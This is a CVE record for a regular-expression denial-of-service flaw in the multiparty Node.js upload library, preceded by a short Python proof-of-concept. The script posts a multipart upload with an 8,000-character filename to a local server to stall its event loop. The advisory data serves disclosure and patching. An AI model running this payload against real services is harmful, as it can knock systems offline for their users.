CVE-2026-8159

import requests # Target URL that uses multiparty to handle uploads target_url = "http://127.0.0.1:3000/upload" # Construct a malicious filename designed to trigger ReDoS. # Based on the advisory, a long header value (approx 8KB) causes backtracking. # A sequence of repeated characters often triggers catastrophic backtracking in naive regex implementations. malicious_filename = ("A" * 8000) + ".txt" # Create the multipart form data files = { 'upload_field': (malicious_filename, 'dummy file content') } try: print(f"Sending payload with filename length: {len(malicious_filename)}") response = requests.post(target_url, files=files, timeout=10) print(f"Request completed with status: {response.status_code}") except requests.exceptions.Timeout: print("Request timed out - Server event loop likely blocked (ReDoS triggered).") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-8159", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-05-12T10:16:48.857", "lastModified": "2026-05-12T10:16:48.857", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "[email protected] and lower versions are vulnerable to denial of service via regular expression backtracking in the Content-Disposition filename parameter parser. A crafted multipart upload with a long header value can cause regex matching to take seconds, blocking the event loop. Impact: any service accepting multipart uploads via multiparty is affected. Workarounds: limiting upload sizes at the proxy or gateway layer reduces but does not eliminate the attack surface, since a small header of around 8 KB is sufficient to trigger the vulnerable backtracking. Upgrade to [email protected] or higher."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb"}, {"url": "https://github.com/pillarjs/multiparty/security/advisories/GHSA-65x3-rw7q-gx94", "source": "ce714d77-add3-4f53-aff5-83d477b104bb"}, {"url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS", "source": "ce714d77-add3-4f53-aff5-83d477b104bb"}]}}